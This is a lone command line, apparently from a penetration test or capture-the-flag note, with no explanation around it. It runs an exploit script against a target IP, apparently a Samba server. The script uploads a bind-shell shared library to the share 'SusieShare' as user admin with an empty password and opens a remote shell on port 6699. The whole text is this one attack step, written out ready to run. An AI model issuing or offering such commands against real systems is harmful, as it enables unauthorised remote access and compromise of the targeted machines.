python ./exploit.py -t $IP -e libbindshell-samba.so  -s SusieShare -r /SusieShare/libbindshell-samba.so -u admin -p '' -P 6699   
